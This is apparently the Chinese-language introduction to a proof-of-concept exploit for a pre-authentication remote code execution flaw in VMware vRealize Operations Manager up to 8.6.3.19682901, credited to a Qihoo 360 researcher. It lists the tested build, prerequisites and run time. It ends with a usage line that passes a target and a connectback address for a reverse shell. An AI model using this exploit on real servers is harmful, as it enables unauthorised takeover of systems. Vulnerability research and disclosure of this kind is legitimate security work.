这是针对 VMware vRealize Operations Manager (vROPS) 的预认证 RCE 漏洞利用程序,影响版本 <= 8.6.3.19682901。
Qihoo 360 Vulnerability Research Institute 的 Steven Seeley
该漏洞利用程序已针对 8.6.3.19682901 进行测试,使用了文件 vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova(SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00),但已知其也可在其他更旧版本上运行。
此漏洞利用程序要求攻击者提供:
APUAT-8.5.0.18176777.pak。此漏洞利用程序涉及很多环节,希望我设计得当,能一次成功。
该漏洞利用程序平均需要约 1m34.142s 完成(测试了 5 次),我试图设计得更快,但它已在比赛分配的时间内;->
researcher@mars:~$ ./poc.py
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9
